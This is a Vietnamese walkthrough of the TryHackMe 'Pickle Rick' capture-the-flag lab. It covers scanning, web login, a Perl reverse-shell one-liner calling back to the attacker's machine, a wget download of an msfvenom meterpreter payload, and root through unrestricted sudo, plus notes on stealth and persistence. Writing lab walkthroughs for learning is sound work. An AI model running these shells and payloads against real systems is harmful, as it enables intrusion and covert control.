Server
-khai thác:
https://tryhackme.com/room/picklerick
Thực
-hiện start machine để lấy địa chỉ ip của
-mục tiêu cần khai thác:
Ping
-kiểm tra máy Kali có đang cùng mạng với Mục tiêu
-hay ko:
Thực
-hiện scan các port TCP:
nmap -vv -Pn -T4 -sC -sV -O -p- 10.10.176.127
Thực hiện việc scan các
-port UDP
nmap -vv -Pn -T4 -sU -sV 10.10.176.127
Dựa
-trên kết quả quét các port TCP và phiên bản như trên, có
-thể thấy Server đang mở 2 port 22 và 80. Trong đó
-port 22 là service SSH với phiên bản OpenSSH 7.2p2.
Thử
-truy cập bằng ssh đên server -> nhưng thất bại
Tìm
-lỗi liên quan đến phiên bản của SSH này
Dựa
-vào kết quả tìm kiếm, rất có thể Server dính lỗ
-hỏng “Usename Enumeration”. Thông qua tìm hiểu thì lỗi này
-thường chạy rất mất thời gian để
-tìm ra username cho SSH, sau đó lại còn phải brute force tìm
-password cho tài khoản đó mà chưa chắc sẽ tìm ra
-được -> tạm thời bỏ qua.
Chuyển
-đến tiếp theo sẽ là port 80. Tiến hành truy cập
-trang web theo địa chỉ của Server, tìm source:
Và
-src của nó sẽ là:
-
- <!DOCTYPE html> <html lang="en"> <head>
- <title>Rick is sup4r cool</title>
- <meta charset="utf-8">
- <meta name="viewport" content="width=device-width,
- initial-scale=1">
- <link rel="stylesheet"
- href="assets/bootstrap.min.css">
- <script src="assets/jquery.min.js"></script>
- <script
- src="assets/bootstrap.min.js"></script>
- <style>
- .jumbotron {
- background-image: url("assets/rickandmorty.jpeg");
- background-size: cover;
- height: 340px; }
- </style> </head> <body>
- <div class="container">
- <div class="jumbotron"></div>
- <h1>Help Morty!</h1></br>
- <p>Listen Morty... I need your help, I've turned myself into a
- pickle again and this time I can't change back!</p></br>
- <p>I need you to <b>*BURRRP*</b>....Morty, logon
- to my computer and find the last three secret ingredients to finish my
- pickle-reverse potion. The only problem is,
- I have no idea what the <b>*BURRRRRRRRP*</b>, password
- was! Help Morty, Help!</p></br>
- </div> <!-- Note to self,
- remember username! Username:
- R1ckRul3s --> </body> </html>
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- -
Phần
-màu xanh lá ở trên là comment trên front end code, đây có thể
-là user dùng để đăng nhập lên chính trang web hoặc
-là dùng đăng nhập SSH. Nhưng tạm thời thì cứ
-để đây và tiếp tục tìm kiếm các thông tin
-khác như các dir ẩn.
Thực
-hiên chạy lệnh:
gobuster dir -w common-web-content.txt -u 10.10.176.127 -t 25 -x
-txt,php,py,sh
· gobuster: tên lệnh
· dir: chế độ tìm file ẩn
· -u: url của server nạn nhân
· -w: tên wordlist cần dùng
· -x: những extension muốn tìm (thường với
-website linux sẽ là txt, php, php5, py, rb, pl, sh)
· -t: số threads chạy trong 1 giây
Có
-thể nhận thấy 2 đường dẫn trả về
-status 200. Tiến hành truy cập 2 trang này.
Với
-url đầu tiên:
Đây
-có thể là password cho username vừa tìm được hồi
-nảy.
Với
-cái thứ 2, chúng ta được một nơi như là
-chỗ để đăng nhập:
Đăng
-nhập thành công thì được một nơi như thế
-này:
Đến
-đây thì test thử một cài câu lệnh xem cái Command Panel
-này hoạt động như thế nào.
TIP QUAN TRỌNG:
Thông
-thường, chúng ta có thể sử dụng trình điều
-khiển này để pentest tiếp, nhưng lúc này lại
-có một vấn đề như thế này. Để có
-thể truy cập vào được trình điều khiển
-server bằng dòng lệnh này, chúng ta cần phải
-đăng nhập thành công vào admin dashboard, vậy điều
-gì sẽ xảy ra nếu như password và username bị thay
-đổi? Khả năng cao là chúng ta sẽ không thể
-truy cập vào trình điều khiển này được nữa
-và phải tìm một lỗi khai thác khác.
Để
-tránh trường hợp trên xảy ra, chúng ta sẽ thiết
-lập một TCP reverse shell. Hay có thể giải thích
-đơn giản rằng chúng ta sẽ thiết lập một
-kết nối TCP từ máy nạn nhân đến máy của
-pentester và chúng ta sẽ điều khiển máy nạn nhân
-thông qua kết nối TCP đó. Như vậy, chúng ta không cần
-phải lo lắng chuyện mất quyền truy cập vào
-trình điểu khiển nữa.
Kiểm
-tra trên server có đang chạy bash, perl, python, ruby gì không?
Chúng
-ta đã xác định được server có chạy những
-loại nào, tiếp theo sẽ tạo một Reverse shell bằng
-những câu lệnh như link sau.( Hoặc link
-này).
Trước
-đó cần phải xác định IP mà máy pentester đã
-dùng VPN tới, đồng thời là một port để
-nhận tín hiệu gửi về. Phần IP thì có sẳn,
-kiểm tra xem một port nào đó có đang được
-mở dùng trên máy dùng câu lệnh nmap, telnet, cat /etc/services.
Chúng
-ta sẽ mượn port 8888 để nhận kết nối
-chỏ về từ máy server. Cách mở port trên máy kali: nc
--nlvp 8888
·
-n: Mang ý
-nghĩa chúng ta sẽ chỉ dùng IPv4 address, không dùng domain
·
--l: Chế
-độ lắng nghe
·
--v: Verbose –
-Cho biết quá trình lắng nghe đang diễn ra thế nào
·
--p: Chỉ
-định port để lắng nghe
Tiếp
-theo sử dụng những câu lệnh để excute từ
-trên server, trong trường hợp này là:
perl -e 'use Socket;$i="10.4.43.108";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh
--i");};'
CHÚ Ý: lúc làm lab tới đây thì tắt đi nghỉ,
-nên địa chỉ server của tryhackmy sẽ thay đổi
-khi bật lên làm tiếp:
-
-IP server: 10.10.105.178
-
-IP của máy kali: 10.4.43.108
Sau khi excute câu lệnh trên
-web cùng với thực hiện lắng nghe trên máy kali, kết
-quả nhận được:
Tìm key thứ nhất:
Sau
-khi có kết nối rồi, dùng lệnh kiểm tra các tập
-tin/ thư mục đang hiện hành nên dùng lệnh “ls -la”
Có
-một file dạng txt khả nghi, đọc file đó =>
-key1: mr. meeseek hair
Tìm key thứ 2
Đầu
-tiên di chuyển ra thư mục root và liệt kê ra các
-file/dir hiện hành:
Kiến
-thức thu lụm được:
Ở
-thời điểm này, chỉ cần chú ý đến 3
-directories đó là
·
-home:
-Nơi chứa những directories của những người
-dùng thông thường. Những người dùng thông thường
-sẽ được phép truy cập vào directory home này,
-nhưng không được phép thay đổi những
-directories (ví dụ như thêm hoặc xóa) được chứa
-bên trong directory home.
·
-root:
-Directory của root hay admin, người có quyền quản
-trị cao nhất và chỉ có root/admin mới được
-quyền truy cập vào đây.
·
-tmp: đây
-là directory thường được dùng để lưu
-trữ những dữ liệu tạm thời, và được
-cấp quyền truy cập, sửa đổi và thực
-thi cho tất cả người dùng hệ thống (cả
-root lẫn người dùng thường). Vì lẽ, directory
-này rất hay bị lợi dụng làm nơi chuyển dữ
-liệu hoặc mã độc giữa máy hacker và máy nạn
-nhân. Cũng như hacker có thể chạy file mã độc
-ngay tại directory tmp để tấn công hệ thống.
Di
-chuyển vào thư mục home, liệt kê các user:
Kết
-quả trả về là có 2 người dùng bình thường
-là rick và ubuntu, và chúng ta có quyền truy cập vào cả 2
-directories này. Thế tại sao account www-data lại không có ở
-đây? Vì account www-data là account mặc định được
-hệ thống webserver (ví dụ như Apache hoặc Nginx,
-v.v.) sử dụng cho các tác vụ thường ngày. Đây
-là một account bình thường và không có quyền hạn
-gì đặc biệt.
Vào
-trong user rick để tìm key thứ 2
Tìm key thứ 3
Lúc
-này chuyển qua user còn lại trong thư mục home để
-tìm. Ở đây chúng ta có 2 file để chú ý là
-.sudo_as_admin_successful và .ssh. Nhưng .sudo_as_admin_successful có số
-byte dữ liệu bằng 0 nên đây là một file trống.
-Còn directory .ssh không cho chúng ta quyền truy cập. Có thể
-thử cd đến .ssh sẽ nhận được báo lỗi
-sau
Do
-đó cần phải leo thang đặc quyền để
-có thể truy cập được trong dir này. Privileges
-escalation là một lĩnh vực khá rộng và có vô số
-cách cũng như kỹ thuật để thực hiện.
-Trong đó có 2 cách phổ biến nhất đó là sử dụng:
·
-Kernal
-exploit: Nghĩa là lợi dụng những lỗ hổng bảo
-mật nằm trong nhân Linux hoặc hệ điều hành
-Ubuntu để tiến hành nâng quyền quản trị.
·
-Sudo rights:
-Lợi dụng các công cụ được cấp quyền
-sử dụng để nâng quyền quản trị.
Đầu
-tiên bắt đầu với Kernal exploit, cần phải
-thu thập thông tin liên quan đến OS, kernel như sau:
Kết
-hợp các điều trên có nghĩa là chúng ta cần tìm một
-phần mềm khai thác lỗi cho phép nâng cấp quyền quản
-trị trên Ubuntu 16.04.5 LTS hoặc Kernel 4.4.0-1072-aws được
-viết bằng Bash, Perl, C hoặc có đuôi .elf (file thực
-thi trên Linux).
Tiến
-hành tìm lỗi những không mấy khả quan
Kết
-quả không mấy khả quan nên sẽ chuyển qua cách
-nâng cấp đặc quyền thứ 2 là sudo right.
Kiến
-thức: tất cả mọi thứ từ
-thiết bị, công cụ, câu lệnh, interface, ip address,
-port, v.v trên Linux đều là một file. Do đó, việc bạn
-có thể sử dụng một công cụ ví dụ Perl hay một
-dòng lệnh ví dụ ls được hay không phụ thuộc
-hoàn toàn vào việc bạn có quyền tiếp cận, và thực
-thi với file Perl hoặc file ls hay không. Mỗi account trong hệ
-thống Linux thường sẽ được cấp
-phép sử dụng một số công cụ hoặc câu lệnh
-để thực hiện công việc của họ. Và các
-công cụ hoặc câu lệnh này nếu không được
-quản trị kỹ, chúng hoàn toàn có thể bị lợi
-dụng để nâng cấp lên quyền quản trị
-cao hơn, hoặc thậm chí là quyền quản trị
-root.
Do
-đó, cần kiểm tra quyền của account hiện tại:
Dựa
-vào kết quả trên chúng ta có thể thấy, account của
-chúng ta có quyền sử dụng bất kỳ công cụ và
-câu lệnh nào đang có trên server Pickle Rick mà không cần phải
-cung cấp password của account hiện tại hoặc
-password của account root.
Do
-không yêu cầu về password nên sử dụng câu lệnh
-“sudo su” để nâng cấp đặc quyền lên root
-luôn.
Lúc
-này xem như đã nắm được toàn bộ Server,
-do đó nên đi vòng vòng kiếm flag cho thử thách thứ
-3 thui, kết quả nhận được sẽ là:
ð Giải được toàn bộ flag của
-Pickle Rick
--------------------------------------------------------------------------------------------------------------------------------------------ĐÂY
-LÀ PHẦN KIẾN THỨC LIÊN QUAN NHƯNG NÂNG CAO
-HƠN------------
---------------------------------------------------------------------------------------------------------------------
Trong
-CTF, sau khi hoàn thành phần 3 bên trên là đã có thể coi
-như đã chiến thắng. Nhưng khi đi làm pentest, sẽ
-có khác biệt một tí. Khác biệt đó nằm ở chỗ
-kết nối TCP reverse shell đang dùng vẫn chưa phải
-là một kết nối bền vững và có thể bị
-can thiệp bất cứ lúc nào do kết nối trên có thể
-bị phát hiện bởi Task Manager. Chưa kể
-đường truyền TCP reverse shell không được
-mã hóa, dễ dẫn đến tình trạng lộ thông tin
-nhạy cảm của cả pentester lẫn nạn nhân.
Để
-phòng tránh việc đó, chúng ta sẽ nâng cấp đường
-truyền từ TCP reverse shell thành Meterpreter shell. Ưu
-điểm của Meterpreter shell so với TCP reverse shell
-như sau:
·
-Meterpreter sử
-dụng in-memory DLL injection, nghĩa là nó sẽ chỉ ghi dữ
-liệu trên RAM mà thôi, và không ghi gì vào ổ cứng cả,
-do đó hạn chế việc để lại dấu vết.
·
-Kết nối
-meterpreter không tạo ra process mới mà sẽ tự inject nó
-vào process đã bị tấn công khiến nó gần như
-vô hình trước các chương trình như Task Manager trên
-Windows. Khi process bị meterpreter tấn công bị kill,
-meterpreter sẽ tự động nhảy sang một process
-khác để duy trì kết nối.
·
-Kết nối
-meterpreter được mã hóa.
·
-Do
-meterpreter là một tính năng của Metasploit, sử dụng
-meterpreter cho phép pentester sử dụng luôn các module post-exploitation
-ví dụ như keyblogger, cổng hậu, v.v. có sẵn trên
-Metasploit để tấn công sâu hơn vào hệ thống của
-nạn nhân.
Chúng
-ta sẽ bắt đầu nâng cấp đường truyền
-từ TCP reverse shell thành Meterpreter shell.
Sử
-dụng câu lệnh sau để tạo ra một file meterpreter
msfvenom
--p linux/x86/meterpreter/reverse_tcp LHOST=10.4.43.108 LPORT=9999 -f elf -o
-shell.elf
Trong
-đó:
·
-msfvenom: Tên câu lệnh
·
--p
-linux/x86/meterpreter/reverse_tcp: Dạng payload hay dạng kết
-nối sẽ sử dụng
·
-LHOST và
-LPORT: Địa chỉ IP và
-port dùng để nhận shell trên máy Kali của hacker
·
--f: Format của dữ liệu đầu ra. Ở
-đây chọn elf là extension file thực thi của Linux.
·
--o: Xuất ra file có tên là shell.elf
Tiếp
-theo sử dụng câu lệnh
Python3 -m http.server 8000
Câu
-lệnh trên sử dụng một module của Python có tên là
-SimpleHTTPServer để biến directory hiện tại thành
-một webserver cho phép trao đổi file tại port 8000 với
-địa chỉ IP là IP của hacker. Webserver này có thể
-được truy cập bởi tất cả các máy ở
-trong cùng mạng.
Sử
-dụng câu lệnh sau trên server để download
wget http://10.4.43.108:8000/shell.elf
Thực
-hiện cấp quyền thực thi trên máy Server và excute file
-đó
Quay
-lại trên máy kali, tiến hành dùng metasploit để nhận
-kết nối trỏ về
msfconsole
use
-exploit/multi/handler
set
-LHOST <IP của bạn>
set
-LPORT <Port đã dùng trong command msfvenom bên trên>
set
-PAYLOAD linux/x86/meterpreter/reverse_tcp
exploit
Kết
-quả cuối cùng nhận được sẽ là